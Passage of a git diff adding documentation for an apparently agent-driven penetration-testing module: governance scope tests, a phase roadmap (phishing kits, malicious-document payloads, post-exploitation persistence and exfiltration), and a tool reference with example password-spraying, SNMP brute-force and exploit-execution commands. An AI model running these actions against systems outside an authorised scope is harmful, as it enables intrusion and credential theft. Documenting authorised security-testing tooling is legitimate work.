+## Governance Tests + +The governance module has comprehensive test coverage across all submodules. + +### Test File + +`test/governance/governance.test.ts` + +### Test Results + +``` + 42 pass + 0 fail + 78 expect() calls +``` + +### Test Categories + +#### GovernanceMatcher Tests + +| Test | Description | +|------|-------------| +| `classifyTarget: IPv4 address` | Classifies "192.168.1.1" as IP | +| `classifyTarget: CIDR notation` | Classifies "10.0.0.0/8" as CIDR | +| `classifyTarget: domain` | Classifies "example.com" as domain | +| `classifyTarget: URL extracts hostname` | Extracts hostname from URLs | +| `classifyTarget: unknown` | Returns unknown for unrecognized strings | +| `classifyTarget: validates IP octets` | Rejects invalid IPs like "999.999.999.999" | +| `extractTargets: bash curl` | Extracts URL from curl commands | +| `extractTargets: bash ping` | Extracts IP from ping commands | +| `extractTargets: bash SSH` | Extracts host from SSH commands | +| `extractTargets: webfetch` | Extracts URL from webfetch tool | +| `extractTargets: websearch` | Returns empty for search queries | +| `extractTargets: deduplication` | Deduplicates same targets | +| `extractTargets: multiple targets` | Extracts multiple different targets | +| `ipInCidr: /8 range` | Tests /8 CIDR matching | +| `ipInCidr: /24 range` | Tests /24 CIDR matching | +| `ipInCidr: /32 single host` | Tests single host matching | +| `ipInCidr: /0 all IPs` | Tests match-all CIDR | +| `matchTarget: IP vs CIDR` | Matches IP against CIDR pattern | +| `matchTarget: domain wildcard` | Matches domain against wildcard | +| `matchTarget: exact domain` | Matches exact domain | + +#### GovernanceScope Tests + +| Test | Description | +|------|-------------| +| `allows when no scope` | Allows all when no config | +| `allows when no targets` | Allows when no targets extracted | +| `allows IP in allowed CIDR` | Allows IPs in allowed range | +| `denies IP not in range` | Denies IPs outside allowed range | +| `deny takes precedence` | Deny list overrides allow list | +| `allows domain matching` | Allows domains matching pattern | +| `denies domain in deny list` | Denies domains matching deny pattern | +| `fails on first violation` | Checks multiple targets, fails fast | + +#### GovernancePolicy Tests + +| Test | Description | +|------|-------------| +| `default action` | Returns default when no policies | +| `matches by tool name` | Matches policy by tool | +| `matches by tool wildcard` | Matches policy by tool pattern | +| `matches bash command` | Matches bash command patterns | +| `non-bash command filter` | Command filter only applies to bash | +| `matches by target` | Matches policy by target pattern | +| `first match wins` | Policy order determines outcome | +| `AND logic` | All conditions must match | +| `describe formatting` | Formats policy description | + +#### GovernanceAudit Tests + +| Test | Description | +|------|-------------| +| `records to memory` | Records audit entry to memory | +| `strips args` | Removes args when include_args=false | +| `lists entries` | Lists entries with filters | +| `memoryCount` | Returns correct entry count | +| `clearMemory` | Clears memory buffer | + +### Running Governance Tests + +```bash +cd packages/opencode + +# Run all governance tests +bun test test/governance/governance.test.ts + +# Run with coverage +bun test test/governance/governance.test.ts --coverage + +# Run specific test +bun test --test-name-pattern "ipInCidr" +``` + +### Standalone Test Script + +For environments without Bun's test runner, use the standalone script: + +```bash +cd packages/opencode +bun run test/governance/test-standalone.ts +``` + +This script runs the same tests without framework dependencies. + +--- + +## Writing Tests + +### Basic Test Structure + +```typescript +import { test, expect, describe, beforeEach } from "bun:test" +import { MyModule } from "../../src/mymodule" + +describe("MyModule", () => { + beforeEach(() => { + // Setup before each test + }) + + test("does something", () => { + const result = MyModule.doSomething() + expect(result).toBe(expectedValue) + }) + + test("handles edge case", () => { + expect(() => MyModule.badInput(null)).toThrow() + }) +}) +``` + +### Common Assertions + +```typescript +// Equality +expect(value).toBe(expected) // Strict equality +expect(value).toEqual(expected) // Deep equality + +// Truthiness +expect(value).toBeTruthy() +expect(value).toBeFalsy() +expect(value).toBeNull() +expect(value).toBeUndefined() +expect(value).toBeDefined() + +// Numbers +expect(value).toBeGreaterThan(n) +expect(value).toBeGreaterThanOrEqual(n) +expect(value).toBeLessThan(n) +expect(value).toBeLessThanOrEqual(n) + +// Strings +expect(string).toContain(substring) +expect(string).toMatch(/regex/) + +// Arrays +expect(array).toContain(item) +expect(array).toHaveLength(n) + +// Objects +expect(object).toHaveProperty("key") +expect(object).toHaveProperty("key", value) + +// Exceptions +expect(() => fn()).toThrow() +expect(() => fn()).toThrow("message") +expect(() => fn()).toThrow(ErrorType) + +// Async +await expect(promise).resolves.toBe(value) +await expect(promise).rejects.toThrow() +``` + +### Testing Async Code + +```typescript +test("async operation", async () => { + const result = await asyncFunction() + expect(result).toBe(expected) +}) + +test("async with beforeEach", async () => { + beforeEach(async () => { + await setup() + }) + + // Tests run after setup completes +}) +``` + +### Mocking + +```typescript +import { mock, spyOn } from "bun:test" + +test("with mock", () => { + const mockFn = mock(() => "mocked") + + const result = mockFn() + + expect(mockFn).toHaveBeenCalled() + expect(mockFn).toHaveBeenCalledTimes(1) + expect(result).toBe("mocked") +}) + +test("with spy", () => { + const spy = spyOn(object, "method") + + object.method() + + expect(spy).toHaveBeenCalled() +}) +``` + +--- + +## Coverage + +### Viewing Coverage + +Run tests with coverage flag: + +```bash +bun test --coverage +``` + +Output shows coverage by file: + +``` +---------------------------|---------|---------|------------------- +File | % Funcs | % Lines | Uncovered Line #s +---------------------------|---------|---------|------------------- +All files | 55.37 | 56.88 | + src/governance/types.ts | 100.00 | 100.00 | + src/governance/matcher.ts | 100.00 | 88.52 | 187-193,270-275 + src/governance/policy.ts | 100.00 | 96.59 | 237,258 + src/governance/scope.ts | 100.00 | 87.30 | 193-194,219-220 + src/governance/audit.ts | 80.00 | 56.31 | ... +---------------------------|---------|---------|------------------- +``` + +### Coverage Goals + +| Module | Target | +|--------|--------| +| Core governance | >90% functions, >80% lines | +| Utilities | >80% functions | +| Integration | >70% lines | + +### Improving Coverage + +1. Identify uncovered lines from coverage report +2. Add tests for edge cases and error paths +3. Test error handling and exception cases +4. Add integration tests for complex flows + +--- + +## Continuous Integration + +Tests run automatically on: + +- Pull request creation +- Push to main/dev branches +- Manual workflow trigger + +### CI Configuration + +Tests are configured in `.github/workflows/` to: + +1. Install dependencies with Bun +2. Run type checking +3. Run test suite +4. Report coverage + +--- + +## Troubleshooting + +### Common Issues + +#### "Cannot find module" Error + +Ensure you're in the correct directory: + +```bash +cd packages/opencode +bun test +``` + +#### Tests Timeout + +Increase timeout for slow tests: + +```typescript +test("slow test", async () => { + // ... +}, 30000) // 30 second timeout +``` + +#### Flaky Tests + +- Avoid relying on timing +- Use proper async/await +- Clean up state in beforeEach/afterEach +- Isolate tests from external dependencies + +#### Coverage Not Working + +Ensure bun version supports coverage: + +```bash +bun --version # Should be 1.0+ +``` + +--- + +## Resources + +- [Bun Test Documentation](https://bun.sh/docs/cli/test) +- [Bun Test API](https://bun.sh/docs/api/test) +- [Jest-compatible Matchers](https://bun.sh/docs/test/matchers) diff --git a/docs/TODO.md b/docs/TODO.md new file mode 100644 index 00000000000..5b005d40a92 --- /dev/null +++ b/docs/TODO.md @@ -0,0 +1,226 @@ +# Pentest Module Development Phases + +## Completed Phases + +### Phase 1-5: Core Pentest Module ✅ +- **types.ts** - Core type definitions using Zod schemas +- **nmap-parser.ts** - Nmap XML output parsing +- **findings.ts** - Security findings storage and management +- **nmap-tool.ts** - Dedicated nmap tool with full feature support +- **sectools.ts** - Wrapper for 30+ security tools + +### Phase 6: Parser Extensions ✅ +- **parsers/nikto.ts** - Nikto web scanner output parser +- **parsers/nuclei.ts** - Nuclei vulnerability scanner parser +- **parsers/gobuster.ts** - Gobuster directory enumeration parser +- **parsers/ffuf.ts** - Ffuf fuzzer output parser +- **parsers/sslscan.ts** - SSL/TLS scanner output parser + +### Phase 7: Report Generation ✅ +- **reports/** - Security assessment report generation +- **report-tool.ts** - Report tool for agents +- Supports Markdown, HTML, JSON output formats + +### Phase 8: Continuous Monitoring ✅ +- **monitoring/** - Scheduled scans with diff detection +- **monitoring/tool.ts** - Monitor tool for agents +- **monitoring/scheduler.ts** - Scan scheduling +- **monitoring/events.ts** - Monitoring events + +### Phase 8b: Exploit Integration ✅ +- **exploits/** - Exploit matching and execution +- **exploits/tool.ts** - Exploit tool for agents +- **exploits/matcher.ts** - CVE to exploit matching +- **exploits/events.ts** - Exploit events + +### Phase 8c: Web Scanner ✅ +- **webscan/** - Web application security scanner +- **webscan/tool.ts** - WebScan tool for agents +- **webscan/crawler.ts** - Web crawler +- **webscan/orchestrator.ts** - Scan coordination +- **webscan/events.ts** - WebScan events + +### Phase 9: API Security Scanner ✅ +Documentation: [PHASE9.md](PHASE9.md) + +- **apiscan/** - API security testing module +- API Discovery (OpenAPI/Swagger, GraphQL) +- Authentication Testing (JWT, API keys, OAuth) +- Authorization Testing (BOLA/IDOR, privilege escalation) +- Injection Testing (SQL, NoSQL, command injection) +- OWASP API Top 10 2023 categorization + +### Phase 10: Network Infrastructure Scanner ✅ +Documentation: [PHASE10.md](PHASE10.md) + +- **netscan/** - Network infrastructure security testing +- Active Directory enumeration (users, groups, computers, trusts) +- Kerberoasting and AS-REP roasting detection +- SMB testing (shares, null sessions, signing, vulnerabilities) +- DNS testing (zone transfers, subdomain enumeration) +- SNMP testing (community strings, SNMP walking) +- LDAP testing (anonymous bind, password policy) +- Credential testing (default creds, password spraying) + +### Phase 11: Cloud Security Scanner ✅ +Documentation: [PHASE11.md](PHASE11.md) + +- **cloudscan/** - Cloud infrastructure security testing +- AWS security assessment (IAM, S3, Security Groups, EC2, Lambda) +- Azure security assessment (RBAC, Storage, NSG, VMs, Function Apps) +- GCP security assessment (IAM, GCS, Firewall, GCE, Cloud Functions) +- Compliance checking (CIS, NIST, PCI-DSS, HIPAA, SOC2, GDPR, ISO27001) +- External tool integration (Prowler, ScoutSuite) + +### Phase 12: Container Security Scanner + CVE Lookup ✅ +Documentation: [PHASE12.md](PHASE12.md) + +- **cve/** - CVE Lookup Service +- NVD API 2.0, OSV API, CISA KEV integration +- CVE data caching with TTL +- Finding enrichment utilities +- **containerscan/** - Container and orchestration security +- Docker image vulnerability scanning (Trivy, Grype) +- SBOM generation (Syft) +- Kubernetes cluster security assessment +- Pod security, RBAC, network policy analysis +- Registry scanning (Docker Hub, ECR, ACR, GCR) +- CIS Docker/Kubernetes compliance + +### Phase 13: Mobile Application Scanner ✅ +Documentation: [PHASE13.md](PHASE13.md) + +- **mobilescan/** - Mobile app security testing +- Android APK analysis (manifest, permissions, components, crypto, storage, network) +- iOS IPA analysis (plist, entitlements, ATS, binary protections) +- OWASP Mobile Top 10 2024 coverage (M1-M10) +- API key/secret detection with entropy calculation +- SSL pinning detection +- Root/jailbreak detection +- Code obfuscation analysis +- URL extraction and categorization +- External tool integration (APKTool, JADX, MobSF, Androguard) +- Multiple scan profiles (discovery, quick, standard, thorough, compliance) + +### Phase 14: Wireless Network Scanner ✅ +Documentation: [PHASE14.md](PHASE14.md) + +- **wirelessscan/** - Wireless security testing +- WiFi network discovery and enumeration +- WPA/WPA2/WPA3 security assessment (KRACK, Dragonblood detection) +- Rogue access point and evil twin detection +- Client enumeration with OUI lookup +- Handshake capture and analysis +- Deauthentication attack detection +- Bluetooth security testing (Classic and BLE) +- BlueBorne, KNOB, BIAS, BLESA vulnerability checks +- RFID/NFC security assessment +- MIFARE Classic/DESFire, NTAG, HID, EM4100 support +- Cloning vulnerability assessment +- External tool integration (Aircrack-ng, Kismet, Bettercap, Ubertooth, Proxmark3) +- Multiple scan profiles (discovery, quick, standard, thorough, passive, active) + +### Phase 15: Social Engineering Toolkit ✅ +Documentation: [PHASE15.md](PHASE15.md) + +- **soceng/** - Social engineering toolkit for authorized security testing +- Email security assessment (SPF/DKIM/DMARC validation, spoofing analysis) +- Lookalike domain generation for awareness testing +- Phishing campaign management (credential harvest, payload delivery, awareness) +- Pre-built phishing templates (password reset, IT support, HR, executive) +- Landing page templates (Microsoft 365, Google, generic login) +- Pretexting scenarios with objection handlers +- Persona library for social engineering engagements +- Call scripts with dialogue trees and transitions +- Payload generation (USB drop, malicious documents, VBA macros, HTA) +- OSINT reconnaissance (email discovery, organization profiling, social media) +- Security awareness training modules with quizzes +- Awareness metrics and industry benchmarking +- Executive summary and campaign reporting +- Session management for tracking assessment progress + +### Phase 16: Post-Exploitation Framework ✅ +Documentation: [PHASE16.md](PHASE16.md) + +- **postexploit/** - Guidance-based post-exploitation framework +- Privilege escalation vectors (SUID, sudo, capabilities, kernel exploits for Linux; services, registry, tokens, UAC for Windows) +- GTFOBins and LOLBAS references with exploitation guidance +- Lateral movement discovery and path analysis (SMB, WMI, SSH, RDP, WinRM, pass-the-hash/ticket) +- Credential harvesting locations (shadow, SSH keys, SAM, LSASS, NTDS, DPAPI, browser creds) +- Persistence mechanism catalog (cron, systemd, registry, scheduled tasks, WMI subscriptions, services) +- Data exfiltration channels (DNS, HTTP, SSH, SMB, cloud, steganography) +- Cleanup and artifact tracking with verification checklists +- LinPEAS and WinPEAS output parsers with automatic vector extraction +- MITRE ATT&CK technique mapping for all operations +- Assessment profiles (discovery, quick, standard, thorough, stealth) +- Session management with comprehensive statistics + +### Phase 18: CI/CD Security Integration ✅ +Documentation: [PHASE18.md](PHASE18.md) + +- **cicd/** - CI/CD pipeline security scanner +- Pipeline discovery for GitHub Actions, GitLab CI, Jenkins +- Secret detection with regex patterns and entropy analysis +- Permission analysis for excessive/risky permissions +- Command injection vulnerability detection +- Supply chain security (unpinned actions, untrusted dependencies) +- SAST integration (Semgrep, Gitleaks) +- Security gate enforcement with configurable rules +- Multiple scan profiles (discovery, quick, standard, thorough, compliance) + +--- + +## Pending Phases + +### Phase 17: Reporting Dashboard 🔜 +- **dashboard/** - Web-based reporting interface +- Real-time scan monitoring +- Finding trend visualization +- Executive summary generation +- Remediation tracking +- Compliance mapping (PCI-DSS, HIPAA, SOC2) + +--- + +## Priority Matrix + +| Phase | Priority | Complexity | Dependencies | Status | +|-------|----------|------------|--------------|--------| +| Phase 11 (Cloud) | High | High | None | ✅ Complete | +| Phase 12 (Container) | High | Medium | Phase 11 | ✅ Complete | +| Phase 13 (Mobile) | Medium | High | None | ✅ Complete | +| Phase 14 (Wireless) | Low | Medium | None | ✅ Complete | +| Phase 15 (SocEng) | Low | Medium | None | ✅ Complete | +| Phase 16 (PostExploit) | Medium | High | Phase 10 | ✅ Complete | +| Phase 17 (Dashboard) | Medium | Medium | All | 🔜 Next | +| Phase 18 (CI/CD) | High | Low | Phase 11, 12 | ✅ Complete | + +--- + +## Test Coverage + +All completed phases have corresponding test files: + +| Phase | Test File | Status | +|-------|-----------|--------| +| Core | `test/pentest/pentest.test.ts` | ✅ Passing | +| Parsers | `test/pentest/parsers.test.ts` | ✅ Passing | +| Reports | `test/pentest/reports.test.ts` | ✅ Passing | +| Monitoring | `test/pentest/monitoring.test.ts` | ✅ Passing | +| Exploits | `test/pentest/exploits.test.ts` | ✅ Passing | +| WebScan | `test/pentest/webscan.test.ts` | ✅ Passing | +| ApiScan | `test/pentest/apiscan.test.ts` | ✅ Passing | +| NetScan | `test/pentest/netscan.test.ts` | ✅ Passing | +| CloudScan | `test/pentest/cloudscan.test.ts` | 🔜 Pending | +| CVE | `test/pentest/cve.test.ts` | 🔜 Pending | +| ContainerScan | `test/pentest/containerscan.test.ts` | 🔜 Pending | +| MobileScan | `test/pentest/mobilescan.test.ts` | 🔜 Pending | +| WirelessScan | `test/pentest/wirelessscan.test.ts` | 🔜 Pending | +| SocEng | `test/pentest/soceng.test.ts` | 🔜 Pending | +| PostExploit | `test/pentest/postexploit.test.ts` | 🔜 Pending | +| CICD | `test/pentest/cicd.test.ts` | 🔜 Pending | + +Run all tests: +```bash +bun test test/pentest/ +``` diff --git a/docs/TOOLS_QUICK_REFERENCE.md b/docs/TOOLS_QUICK_REFERENCE.md new file mode 100644 index 00000000000..f7437ddd038 --- /dev/null +++ b/docs/TOOLS_QUICK_REFERENCE.md @@ -0,0 +1,832 @@ +# Pentest Tools Quick Reference Guide + +Quick reference for all security testing tools available in the pentest module. + +--- + +## Table of Contents + +1. [SecTools - Security Tools Wrapper](#sectools---security-tools-wrapper) +2. [NetScan - Network Scanner](#netscan---network-scanner) +3. [WebScan - Web Application Scanner](#webscan---web-application-scanner) +4. [ApiScan - API Security Scanner](#apiscan---api-security-scanner) +5. [CloudScan - Cloud Security Scanner](#cloudscan---cloud-security-scanner) +6. [ContainerScan - Container Security Scanner](#containerscan---container-security-scanner) +7. [CVE - CVE Lookup Tool](#cve---cve-lookup-tool) +8. [Exploits - Exploit Search Tool](#exploits---exploit-search-tool) +9. [Monitor - Continuous Monitoring](#monitor---continuous-monitoring) +10. [Report - Report Generation](#report---report-generation) + +--- + +## SecTools - Security Tools Wrapper + +Unified interface to common penetration testing tools (nmap, nikto, nuclei, etc.). + +### Supported Tools + +| Category | Tools | +|----------|-------| +| Network Recon | nmap, masscan, netcat | +| Web Scanning | nikto, dirb, gobuster, ffuf, wpscan | +| Vulnerability | nuclei, searchsploit | +| SQL Injection | sqlmap | +| SMB/Windows | enum4linux, smbclient, crackmapexec | +| SSL/TLS | sslscan, sslyze, testssl | +| DNS | dnsenum, dnsrecon, fierce | + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `tool` | string | Yes | Tool name (nmap, nikto, nuclei, etc.) | +| `target` | string | Yes | Target IP, hostname, or URL | +| `args` | string | No | Tool-specific arguments | +| `timeout` | number | No | Timeout in milliseconds | +| `createFindings` | boolean | No | Create findings from results (default: true) | + +### Examples + +``` +# Nikto web scan +sectools tool="nikto" target="http://example.com" args="-Tuning 1" + +# Gobuster directory enumeration +sectools tool="gobuster" target="http://example.com" args="dir -w /usr/share/wordlists/dirb/common.txt" + +# Enum4linux SMB enumeration +sectools tool="enum4linux" target="192.168.1.1" args="-a" + +# SSL scan +sectools tool="sslscan" target="example.com" + +# Nmap service scan +sectools tool="nmap" target="192.168.1.0/24" args="-sV -sC -p 1-1000" + +# Nuclei vulnerability scan +sectools tool="nuclei" target="http://example.com" args="-t cves/" +``` + +--- + +## NetScan - Network Scanner + +Comprehensive network infrastructure security scanner with AD, SMB, DNS, LDAP, and SNMP support. + +### Actions + +| Action | Description | +|--------|-------------| +| `discover` | Discover network hosts and services | +| `scan` | Run full scan with specified profile | +| `status` | Get scan status | +| `ad-enum` | Enumerate Active Directory domain | +| `ad-users` | Enumerate AD users | +| `ad-groups` | Enumerate AD groups | +| `ad-computers` | Enumerate AD computers | +| `ad-kerberoast` | Find Kerberoastable accounts | +| `ad-asrep` | Find AS-REP roastable accounts | +| `smb-shares` | Enumerate SMB shares | +| `smb-sessions` | Enumerate SMB sessions | +| `dns-zone` | Attempt DNS zone transfer | +| `dns-enum` | DNS enumeration | +| `ldap-search` | LDAP search | +| `ldap-policy` | Get password policy via LDAP | +| `snmp-walk` | SNMP enumeration | +| `snmp-brute` | SNMP community string brute force | +| `creds-spray` | Password spraying attack | +| `creds-check` | Check credentials | +| `creds-defaults` | Check for default credentials | + +### Profiles + +| Profile | Description | +|---------|-------------| +| `discovery` | Host discovery only | +| `quick` | Fast scan, common ports | +| `standard` | Balanced scan | +| `thorough` | Comprehensive scan | +| `stealth` | Low and slow | +| `ad-focused` | Active Directory focused | + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `target` | string | Yes* | Target IP/range/hostname | +| `profile` | string | No | Scan profile | +| `username` | string | No | Authentication username | +| `password` | string | No | Authentication password | +| `domain` | string | No | AD domain name | +| `ports` | string | No | Port range (e.g., "1-1000") | +| `community` | string | No | SNMP community string | + +### Examples + +``` +# Discover hosts on network +netscan action="discover" target="192.168.1.0/24" + +# Full network scan +netscan action="scan" target="192.168.1.0/24" profile="standard" + +# AD enumeration with credentials +netscan action="ad-enum" target="dc.corp.local" domain="corp.local" username="admin" password="pass123" + +# Enumerate AD users +netscan action="ad-users" target="dc.corp.local" domain="corp.local" username="admin" password="pass123" + +# SMB share enumeration +netscan action="smb-shares" target="192.168.1.10" username="admin" password="pass123" + +# DNS zone transfer attempt +netscan action="dns-zone" target="ns1.example.com" domain="example.com" + +# Password spray attack +netscan action="creds-spray" target="192.168.1.10" domain="corp.local" username="userlist.txt" password="Spring2024!" + +# SNMP enumeration +netscan action="snmp-walk" target="192.168.1.1" community="public" + +# Check default credentials +netscan action="creds-defaults" target="192.168.1.1" +``` + +--- + +## WebScan - Web Application Scanner + +Web application security scanner with crawling, vulnerability detection, and OWASP reporting. + +### Actions + +| Action | Description | +|--------|-------------| +| `crawl` | Crawl website and discover pages | +| `scan` | Run security scan with profile | +| `quick-scan` | Fast vulnerability scan | +| `full-scan` | Comprehensive security scan | +| `owasp` | Generate OWASP Top 10 report | +| `status` | Get scan status | +| `profiles` | List available profiles | + +### Profiles + +| Profile | Description | +|---------|-------------| +| `discovery` | Crawl and enumerate only | +| `quick` | Fast common vulnerability checks | +| `standard` | Balanced security scan | +| `thorough` | Deep comprehensive scan | +| `api` | API-focused testing | +| `authenticated` | With authentication | + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `target` | string | Yes* | Target URL | +| `profile` | string | No | Scan profile | +| `maxDepth` | number | No | Max crawl depth | +| `maxPages` | number | No | Max pages to crawl | +| `headers` | object | No | Custom HTTP headers | +| `cookies` | string | No | Session cookies | +| `scanId` | string | No | Scan ID for status/owasp | + +### Examples + +``` +# Crawl website +webscan action="crawl" target="http://example.com" maxDepth=3 + +# Quick vulnerability scan +webscan action="quick-scan" target="http://example.com" + +# Full security scan +webscan action="full-scan" target="http://example.com" + +# Scan with profile +webscan action="scan" target="http://example.com" profile="thorough" + +# Authenticated scan +webscan action="scan" target="http://example.com" profile="authenticated" cookies="session=abc123" + +# Generate OWASP report +webscan action="owasp" scanId="scan_abc123" + +# Check scan status +webscan action="status" scanId="scan_abc123" +``` + +--- + +## ApiScan - API Security Scanner + +API security scanner supporting OpenAPI, GraphQL, JWT analysis, BOLA, and injection testing. + +### Actions + +| Action | Description | +|--------|-------------| +| `discover` | Discover API endpoints | +| `parse-spec` | Parse OpenAPI/GraphQL spec | +| `jwt-analyze` | Analyze JWT token security | +| `scan` | Run API security scan | +| `quick-scan` | Fast API scan | +| `full-scan` | Comprehensive API scan | +| `status` | Get scan status | +| `profiles` | List available profiles | + +### Profiles + +| Profile | Description | +|---------|-------------| +| `discovery` | Endpoint discovery only | +| `quick` | Fast common checks | +| `standard` | Balanced API testing | +| `thorough` | Deep API security scan | +| `auth-focused` | Authentication/authorization focus | + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `target` | string | Yes* | Base API URL | +| `specUrl` | string | No | OpenAPI/GraphQL spec URL | +| `token` | string | No | Bearer token for auth | +| `profile` | string | No | Scan profile | +| `headers` | object | No | Custom headers | + +### Examples + +``` +# Discover API endpoints +apiscan action="discover" target="http://api.example.com" + +# Parse OpenAPI spec +apiscan action="parse-spec" specUrl="http://api.example.com/openapi.json" + +# Parse GraphQL schema +apiscan action="parse-spec" specUrl="http://api.example.com/graphql" + +# Analyze JWT token +apiscan action="jwt-analyze" token="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." + +# Quick API scan +apiscan action="quick-scan" target="http://api.example.com" + +# Full scan with authentication +apiscan action="full-scan" target="http://api.example.com" token="Bearer eyJ..." + +# Scan with spec +apiscan action="scan" target="http://api.example.com" specUrl="http://api.example.com/openapi.json" profile="thorough" +``` + +--- + +## CloudScan - Cloud Security Scanner + +Multi-cloud security scanner for AWS, Azure, and GCP with compliance checking. + +### Actions + +| Action | Description | +|--------|-------------| +| `discover` | Discover cloud resources | +| `scan` | Run security scan | +| `quick-scan` | Fast security scan | +| `iam-scan` | IAM-focused scan | +| `storage-scan` | Storage security scan | +| `network-scan` | Network security scan | +| `compliance` | Compliance check | +| `prowler` | Run Prowler scan (AWS) | +| `scoutsuite` | Run ScoutSuite scan | +| `prerequisites` | Check tool prerequisites | +| `status` | Get scan status | +| `profiles` | List profiles | + +### Providers + +| Provider | Auth Method | +|----------|-------------| +| `aws` | AWS CLI profile or environment | +| `azure` | Azure CLI or service principal | +| `gcp` | GCP service account or gcloud | + +### Profiles + +| Profile | Description | +|---------|-------------| +| `discovery` | Resource enumeration only | +| `quick` | Fast security checks | +| `standard` | Balanced security scan | +| `thorough` | Comprehensive scan | +| `compliance` | Compliance-focused | + +### Compliance Frameworks + +- `cis` - CIS Benchmarks +- `nist` - NIST 800-53 +- `pci-dss` - PCI DSS +- `hipaa` - HIPAA +- `soc2` - SOC 2 +- `aws-foundational-security` - AWS Foundational Security + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `provider` | string | Yes | Cloud provider (aws/azure/gcp) | +| `profile` | string | No | Scan profile | +| `regions` | array | No | Regions to scan | +| `awsProfile` | string | No | AWS CLI profile name | +| `azureSubscription` | string | No | Azure subscription ID | +| `gcpProject` | string | No | GCP project ID | +| `frameworks` | array | No | Compliance frameworks | + +### Examples + +``` +# Discover AWS resources +cloudscan action="discover" provider="aws" regions=["us-east-1","us-west-2"] + +# Full AWS security scan +cloudscan action="scan" provider="aws" profile="standard" + +# Quick Azure scan +cloudscan action="quick-scan" provider="azure" azureSubscription="sub-123" + +# GCP IAM scan +cloudscan action="iam-scan" provider="gcp" gcpProject="my-project" + +# AWS compliance check +cloudscan action="compliance" provider="aws" frameworks=["cis","pci-dss"] + +# Run Prowler on AWS +cloudscan action="prowler" provider="aws" awsProfile="prod" + +# Run ScoutSuite +cloudscan action="scoutsuite" provider="aws" + +# Check prerequisites +cloudscan action="prerequisites" provider="aws" +``` + +--- + +## ContainerScan - Container Security Scanner + +Container and Kubernetes security scanner with image vulnerability scanning and SBOM generation. + +### Actions + +| Action | Description | +|--------|-------------| +| `discover` | Discover images, containers, registries | +| `scan` | Run security scan with profile | +| `scan-image` | Scan specific container image | +| `scan-runtime` | Analyze running containers | +| `scan-registry` | Scan images in registry | +| `scan-cluster` | Kubernetes cluster audit | +| `sbom` | Generate SBOM for image | +| `compliance` | CIS Docker/K8s benchmark | +| `status` | Get scan status | +| `profiles` | List profiles | + +### Profiles + +| Profile | Description | +|---------|-------------| +| `discovery` | Enumerate only | +| `quick` | Fast vulnerability scan | +| `standard` | Balanced scan | +| `thorough` | Comprehensive scan | +| `compliance` | Compliance focus | +| `sbom-only` | SBOM generation only | + +### External Tools Used + +- **Trivy** - Image vulnerability scanning +- **Grype** - Dependency vulnerability scanning +- **Syft** - SBOM generation +- **Kubeaudit** - Kubernetes audit + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `image` | string | No | Container image to scan | +| `profile` | string | No | Scan profile | +| `targets` | array | No | Multiple images to scan | +| `registry` | string | No | Registry URL | +| `kubeconfig` | string | No | Kubeconfig path | +| `namespace` | string | No | Kubernetes namespace | +| `framework` | string | No | Compliance framework | + +### Examples + +``` +# Discover local images and containers +containerscan action="discover" + +# Scan specific image +containerscan action="scan-image" image="nginx:latest" + +# Scan with Trivy and Grype +containerscan action="scan-image" image="myapp:v1.0" profile="thorough" + +# Analyze running containers +containerscan action="scan-runtime" + +# Kubernetes cluster security audit +containerscan action="scan-cluster" + +# Scan specific namespace +containerscan action="scan-cluster" namespace="production" + +# Generate SBOM +containerscan action="sbom" image="nginx:latest" + +# CIS Docker benchmark +containerscan action="compliance" framework="cis-docker" + +# CIS Kubernetes benchmark +containerscan action="compliance" framework="cis-kubernetes" + +# Full scan multiple images +containerscan action="scan" profile="thorough" targets=["nginx:latest","redis:7","postgres:15"] + +# Scan registry +containerscan action="scan-registry" registry="registry.example.com" +``` + +--- + +## CVE - CVE Lookup Tool + +CVE database lookup with NVD, OSV, and CISA KEV integration. + +### Actions + +| Action | Description | +|--------|-------------| +| `lookup` | Look up single CVE | +| `bulk-lookup` | Look up multiple CVEs | +| `search` | Search CVEs by keyword | +| `kev-check` | Check if CVEs are in CISA KEV | +| `enrich-findings` | Enrich findings with CVE data | + +### Data Sources + +- **NVD** - NIST National Vulnerability Database +- **OSV** - Open Source Vulnerabilities +- **CISA KEV** - Known Exploited Vulnerabilities + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `cveId` | string | No | Single CVE ID | +| `cveIds` | array | No | Multiple CVE IDs | +| `keyword` | string | No | Search keyword | +| `product` | string | No | Product name for search | +| `vendor` | string | No | Vendor name for search | + +### Examples + +``` +# Lookup single CVE +cve action="lookup" cveId="CVE-2021-44228" + +# Bulk lookup multiple CVEs +cve action="bulk-lookup" cveIds=["CVE-2021-44228","CVE-2023-4911","CVE-2024-3094"] + +# Search by keyword +cve action="search" keyword="log4j" + +# Search by product +cve action="search" product="apache" vendor="apache" + +# Check if CVEs are in CISA KEV (actively exploited) +cve action="kev-check" cveIds=["CVE-2021-44228","CVE-2023-4911"] + +# Enrich findings with CVE data +cve action="enrich-findings" cveIds=["CVE-2021-44228","CVE-2023-4911"] +``` + +### Response Data + +CVE lookup returns: +- CVSS v2/v3 scores and vectors +- Severity rating +- Description +- CWE IDs +- References +- Affected products/versions +- CISA KEV status +- Public exploit availability + +--- + +## Exploits - Exploit Search Tool + +Search and manage exploits from ExploitDB and Metasploit. + +### Actions + +| Action | Description | +|--------|-------------| +| `search` | Search for exploits | +| `suggest` | Suggest exploits for a finding | +| `info` | Get exploit details | +| `check` | Check if target is vulnerable | +| `execute` | Execute exploit (with confirmation) | + +### Parameters + +| Parameter | Type | Required | Description | +|-----------|------|----------|-------------| +| `action` | string | Yes | Action to perform | +| `query` | string | No | Search query | +| `findingId` | string | No | Finding ID for suggestions | +| `module` | string | No | Exploit module path | +| `target` | string | No | Target for check/execute | +| `dryRun` | boolean | No | Simulate execution | +| `options` | object | No | Exploit options (RHOSTS, LHOST, etc.) | + +### Examples + +``` +# Search for Apache exploits +exploits action="search" query="apache 2.4" + +# Search for 